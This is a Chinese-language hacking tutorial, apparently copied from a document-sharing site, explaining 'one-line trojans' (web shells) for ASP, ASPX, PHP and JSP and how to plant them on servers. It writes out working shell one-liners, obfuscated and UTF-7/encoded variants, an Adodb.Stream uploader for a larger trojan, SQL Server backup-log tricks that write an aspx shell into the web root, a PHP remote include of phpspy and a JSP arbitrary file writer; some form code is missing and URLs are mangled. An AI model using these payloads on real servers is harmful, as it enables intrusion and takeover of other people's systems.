再谈一句话木马的原理及利用

再谈一句话木马的原理及利用(asp,aspx,php,jsp)


一句话木马的适用环境:
1.服务器的来宾账户有写入权限
2.已知数据库地址且数据库格式为asa或asp
3.在数据库格式不为asp或asa的情况下,如果能将一句话插入到asp文件中也可

一句话木马的工作原理:

"一句话木马"服务端(本地的html提交文件)
就是我们要用来插入到asp文件中的asp语句,(不仅仅是以asp为后缀的数据库文件),该语句将回为触发,接收入侵者通过客户端提交的数据,执行并完成相应的操作,服务端的代码内容为 <%execute request("value")%> 其中value可以自己修改

"一句话木马"客户端(远程服务器上被插入一句话的asp文件)
用来向服务端提交控制数据的,提交的数据通过服务端构成完整的asp功能语句并执行,也就是生成我们所需要的asp木马文件

现在先假设在远程主机的TEXT.ASP(客户端)中已经有了<%execute request("value")%>这个语句.)在ASP里<%execute ............")%>意思是执行省略号里的语句.那么如果我写进我们精心构造的语句,它也是会帮我们执行的.就按照这上面的思路,我们就可以在本地构造一个表单内容如下:(//为注释)












表单的作用就是把我们表单里的内容提交到远程主机的TEXT.ASP这个文件.然后因为TEXT.ASP里有<%execute request("value")%>这句,那么这句代码就会执行我们从表单里传来的内容哦.(表单名必须和<%execute request("value")%>里的VALUE一样,就是我用蓝色标记的那两处,必须相等)

说到这里大家是不是清楚了.我们构造了两个表单,第一个表单里的代码是文件操作的代码(就是把第二个表单内的内容写入在当前目录下并命名为newvalue.ASP的这么一段操作的处理代码)那么第二个表单当然就是我们要写入的马了.

具体的就是下面这一段:

set lP=server.createObject("Adodb.Stream")//建立流对象
lP.Open //打开
lP.Type=2 //以文本方式
lP.CharSet="gb2312" //字体标准
lP.writetext request("newvalue")

lP.SaveToFile server.mappath("newvalue.asp"),2 //将木马内容以覆盖文件的方式写入newmm.asp,2就是已

覆 盖的方式
lP.Close //关闭对象
set lP=nothing //释放对象
response.redirect "newmm.asp" //转向newmm.asp

这样的话第二个表单的名字必须和lP.writetext request("newvalue") 里的Newvalue一样,就是我用红色标注的那两处.
至此只要服务器有写的权限你表单所提交的大马内容就会被写入到newmm.asp中。即newmm.asp为我们的shell地址。

关于服务器错误:

经常,当我们在一个asp文件内添加了一句话后,就会出现类型不匹配的错误:
Script error detected at line 1.
Source line: execute request("nettoo")
Description: 类型不匹配: 'execute'
这个如何解决呢?
想出了一个好办法,只要用"eval"替换掉"execute"服务端,就不会出错了!
用一句话客户端连接,加入容错语句,你可以把它插入到任何ASP文件而不会像以前一样出错。
<%On Error Resume Next execute request("value")%>

常见asp一句话木马的变体:

<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
https://www.360docs.net/doc/157550627.html,nguage="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session
ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>


<%ExecuteGlobal request(chr(35))%>

<%ExecuteGlobal request(chr(35))%>

<%execute request("#")%>

<%execute request(chr(35))%>



<%ExecuteGlobal request(chr(35))%> 9月30日

<%eval request("#")%>

数据库里插入
┼攠数畣整爠焕敌瑳∨∣┩忾

utf-7的马
<%@ codepage=65000%>
<% response.Charset="936"%>
<%e+j-x+j-e+j-c+j-u+j-t+j-e+j-(+j-r+j-e+j-q+j-u+j-e+j-s+j-t+j-(+j-+ACI-#+ACI)+j-)+j-%>


<%set ms = server.CreateObject("MSScriptControl.ScriptControl.1")
https://www.360docs.net/doc/157550627.html,nguage="VBScript"
ms.AddObject "Response", Response
ms.AddObject "request", request
ms.AddObject "session", session


ms.AddObject "server", server
ms.AddObject "application", application
ms.ExecuteStatement ("ex"&"ecute(request(chr(35)))")%>

<%@ LANGUAGE = VBScript.Encode %>
<%#@~^PgAAAA==r6P. ;!+/D`14Dv&X#*@!@*ErPPD4+ P2Xn^ED+VVG4Cs,Dn;!n/D`^4M`&Xb*oBMAAA==^#~@%>


各种环境下的一句话木马:

aspx

1.相当于ASP的一句话木马:

程序代码

alter database pubs set RECOVERY FULL--
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('<%@ Page Language="C#" validateRequest="false" %><%System.IO.StreamWriter ow=new System.IO.StreamWriter(Server.MapPath("images.aspx"),false);ow.Write(Request.Params["l"]);ow.Close()%> ')
backup log pubs to disk = 'd:\test11.aspx'
//这个和asp的一样,客户端post一个变量l 把木马代码丢在变量l里面就ok了 这个是类似asp的一句话木马。
//mu.aspx.htm 客户端:(提交后访问:http://IP/im

ages.aspx)


在下面输入大马内容:






2、下面这个是我找网上的https://www.360docs.net/doc/157550627.html,的上传文件程序,修改精简了下,也可以用:

程序代码

drop table pubs.dbo.cmd
alter database pubs set RECOVERY FULL
create table pubs.dbo.cmd(a image)
backup log pubs to disk = 'c:\TM' with init
insert into pubs.dbo.cmd(a) values ('')


backup log pubs to disk = 'c:\inetpub\wwwroot\test11.aspx'


PHP

本文没有什么特别之处,仅求抛砖引

玉。并送给和我一样菜的在PHP门边徘徊的朋友。
刚学PHP没几天,我就急于功成,所以有错误及不足之处请大家积极指出。
PHP语法的强大是ASP望尘莫及的,仅一个:就可以刺探整个服务器的配置。运行cmd,上传文件等,都是非常简便的,现在用的好的PHP木马,莫过于angel的phpspy了。昨天hak_ban问怎么给PHP木马加密,我还没想到,但是对于写一个微型PHP木马,我想还是很难被杀的。
这里简单探讨一下几个函数可以作为木马的使用:
1. 可以运行外部命令的几个函数:system,passthru,exec,shell_exec,popen。
例:只要将等保存为cmd.php及可实现运行外部命令的功能。这几个函数可以说是最早的微行php木马了,所以一般虚拟主机的设置也会将这些函数屏蔽的。
2.还记得WDB论坛的style.php的漏洞吗?我们可以利用这个做个很难被杀的小木马。如下:

将其保存为1.php ,我们就可以调用其他不支持php服务器里的.php木马(如phpspy.php)来达到我们的目的:https://www.360docs.net/doc/157550627.html,/1.php? Include=https://www.360docs.net/doc/157550627.html,/phpspy.php
这里https://www.360docs.net/doc/157550627.html,是不支持php的,否则将会在https://www.360docs.net/doc/157550627.html,这台服务器运行phpspy.php,而不是目标服务器。
3. 这个还是angel在Discuz 2.2F的攻击中给我们的一个非常好的上传木马,我没有改:

将其保存为up.php后,在本地提交表单:





就可以把大个的php木马上传上去。
4. 我一直在想有没有同冰狐浪子的那个ASP一句话木马一样通过本地表单提交运行的PHP木马。终于找到了函数:eval,在PHP4中文参考手册上它的语法说明:
语法: void eval(string code_str);
内容说明:本函数可将字符串之中的变量值代入,通常用在处理数据库的资料上。参数 code_str 为欲处理的字符串。值的 注意的是待处理的字符串要符合 PHP 的字符串格式,同时在结尾处要有分号。使用本函数处理后的字符串会沿续到 PHP 程序结束。
我们可以在目标主机上保存:为一个PHP文件(我想也可以插在PHP任意文件里)。然后通过本地提交来达到目的,但与ASP不同的是,在magic_quotes_gpc = on的时候,过滤的很多的字符,使得这个使用功能大大的缩小。
对于这个PHP木马本地表单我做了很多次,还没有成熟的代码。还请高手指教。写好后会奉献给大家的。但是eval这个函数可以做微型PHP木马是无须质疑的。
Ps:写完后,有人告诉我,其实高手早就有微型的PHP木马了,只是没有公开。哎,我好郁

闷啊,研究的都是人家早就有了的成果。不管怎么样,和大家分享一下我的研究,希望能得到帮助和指教。


JSP

<%
if(request.getParameter("f")!=null)(new java.io.FileOutputStream(application.getRealPath("\\")+request.getParameter("f"))).write(request.getParameter("t").getBytes());
%>
这个 后门估计不用我说了吧.还是提示一下咯.保存为1.jsp 提交url!

http://localhost/1.jsp?f=1.txt&t=hello

然后:http://localhost/1.txt 就出来了 内容为 hello .....

总结完毕


相关文档
最新文档